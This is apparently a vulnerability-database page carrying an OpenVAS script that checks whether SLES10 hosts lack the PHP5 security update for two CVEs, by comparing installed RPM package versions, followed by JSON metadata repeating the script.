Search...

SLES10: Security update for PHP5

2009-10-13T00:00:00

ID OPENVAS:65786
Type openvas
Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
Modified 2017-07-11T00:00:00

Description

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected:

apache2-mod_php5
php5
php5-bcmath
php5-bz2
php5-calendar
php5-ctype
php5-curl
php5-dba
php5-dbase
php5-devel
php5-dom
php5-exif
php5-fastcgi
php5-ftp
php5-gd
php5-gettext
php5-gmp
php5-iconv
php5-imap
php5-json
php5-ldap
php5-mbstring
php5-mcrypt
php5-mhash
php5-mysql
php5-ncurses
php5-odbc
php5-openssl
php5-pcntl
php5-pdo
php5-pear
php5-pgsql
php5-posix
php5-pspell
php5-shmop
php5-snmp
php5-soap
php5-sockets
php5-sqlite
php5-suhosin
php5-sysvmsg
php5-sysvsem
php5-sysvshm
php5-tokenizer
php5-wddx
php5-xmlreader
php5-xmlrpc
php5-xsl
php5-zlib

More details may also be found by searching for the SuSE Enterprise Server 10 patch database located at http://download.novell.com/patch/finder/

                                        
                                            #
#VID slesp2-apache2-mod_php5-6069
# OpenVAS Vulnerability Test
# $
# Description: Security update for PHP5
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system.  One or more of the following packages
are affected:

    apache2-mod_php5
    php5
    php5-bcmath
    php5-bz2
    php5-calendar
    php5-ctype
    php5-curl
    php5-dba
    php5-dbase
    php5-devel
    php5-dom
    php5-exif
    php5-fastcgi
    php5-ftp
    php5-gd
    php5-gettext
    php5-gmp
    php5-iconv
    php5-imap
    php5-json
    php5-ldap
    php5-mbstring
    php5-mcrypt
    php5-mhash
    php5-mysql
    php5-ncurses
    php5-odbc
    php5-openssl
    php5-pcntl
    php5-pdo
    php5-pear
    php5-pgsql
    php5-posix
    php5-pspell
    php5-shmop
    php5-snmp
    php5-soap
    php5-sockets
    php5-sqlite
    php5-suhosin
    php5-sysvmsg
    php5-sysvsem
    php5-sysvshm
    php5-tokenizer
    php5-wddx
    php5-xmlreader
    php5-xmlrpc
    php5-xsl
    php5-zlib


More details may also be found by searching for the SuSE
Enterprise Server 10 patch database located at
http://download.novell.com/patch/finder/";

tag_solution = "Please install the updates provided by SuSE.";

if(description)
{
 script_id(65786);
 script_version("$Revision: 6666 $");
 script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
 script_tag(name:"creation_date", value:"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)");
 script_cve_id("CVE-2008-5498", "CVE-2009-0754");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_name("SLES10: Security update for PHP5");



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
 script_family("SuSE Local Security Checks");
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-rpm.inc");

res = "";
report = "";
if ((res = isrpmvuln(pkg:"apache2-mod_php5", rpm:"apache2-mod_php5~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5", rpm:"php5~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-bcmath", rpm:"php5-bcmath~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-bz2", rpm:"php5-bz2~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-calendar", rpm:"php5-calendar~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-ctype", rpm:"php5-ctype~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-curl", rpm:"php5-curl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-dba", rpm:"php5-dba~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-dbase", rpm:"php5-dbase~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-devel", rpm:"php5-devel~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-dom", rpm:"php5-dom~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-exif", rpm:"php5-exif~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-fastcgi", rpm:"php5-fastcgi~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-ftp", rpm:"php5-ftp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-gd", rpm:"php5-gd~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-gettext", rpm:"php5-gettext~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-gmp", rpm:"php5-gmp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-iconv", rpm:"php5-iconv~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-imap", rpm:"php5-imap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-json", rpm:"php5-json~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-ldap", rpm:"php5-ldap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-mbstring", rpm:"php5-mbstring~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-mcrypt", rpm:"php5-mcrypt~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-mhash", rpm:"php5-mhash~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-mysql", rpm:"php5-mysql~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-ncurses", rpm:"php5-ncurses~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-odbc", rpm:"php5-odbc~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-openssl", rpm:"php5-openssl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-pcntl", rpm:"php5-pcntl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-pdo", rpm:"php5-pdo~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-pear", rpm:"php5-pear~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-pgsql", rpm:"php5-pgsql~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-posix", rpm:"php5-posix~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-pspell", rpm:"php5-pspell~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-shmop", rpm:"php5-shmop~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-snmp", rpm:"php5-snmp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-soap", rpm:"php5-soap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-sockets", rpm:"php5-sockets~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-sqlite", rpm:"php5-sqlite~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-suhosin", rpm:"php5-suhosin~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvmsg", rpm:"php5-sysvmsg~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvsem", rpm:"php5-sysvsem~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvshm", rpm:"php5-sysvshm~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-tokenizer", rpm:"php5-tokenizer~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-wddx", rpm:"php5-wddx~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-xmlreader", rpm:"php5-xmlreader~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-xmlrpc", rpm:"php5-xmlrpc~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-xsl", rpm:"php5-xsl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"php5-zlib", rpm:"php5-zlib~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
    report += res;
}

if (report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"href": "http://plugins.openvas.org/nasl.php?oid=65786", "history": [{"lastseen": "2017-07-02T21:14:09", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=65786", "history": [], "naslFamily": "SuSE Local Security Checks", "id": "OPENVAS:65786", "title": "SLES10: Security update for PHP5", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-13T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b778055b37159119ce97e96620d4ff56"}, {"key": "modified", "hash": "7a13a3f1c0b1fc1a5dc5946c30b2272b"}, {"key": "pluginID", "hash": "3a1eda493fe218efb088d6019dc86c58"}, {"key": "title", "hash": "b74b0a9c903004716c5482ee5468cbeb"}, {"key": "href", "hash": "d35bec6bdce0a8e21568e089b3817eed"}, {"key": "cvelist", "hash": "e860654227fcd5593f826277c7bae8e9"}, {"key": "published", "hash": "ddca62dcc15ed77d339ae90bcf0f3da3"}, {"key": "sourceData", "hash": "a211567607ca29139d54036e2d5a39bd"}, {"key": "cvss", "hash": "a792e2393dff1e200b885c5245988f6f"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "description", "hash": "7608ae0919cdf8dc8fedb799fb95bfaa"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}], "sourceData": "#\n#VID slesp2-apache2-mod_php5-6069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65786);\n script_version(\"$Revision: 5148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"login/SSH/success\", \"HostDetails/OS/cpe:/o:suse:linux_enterprise_server\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "pluginID": "65786", "hash": "eb2120a1e4fbb848fd04a5b3a290d5f2c89b343d62036abae376b9c683b35379", "modified": "2017-01-31T00:00:00", "edition": 1, "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "lastseen": "2017-07-02T21:14:09", "viewCount": 0, "enchantments": {}, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "objectVersion": "1.3", "references": []}}], "naslFamily": "SuSE Local Security Checks", "id": "OPENVAS:65786", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-13T00:00:00", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "title": "SLES10: Security update for PHP5", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "#\n#VID slesp2-apache2-mod_php5-6069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65786);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 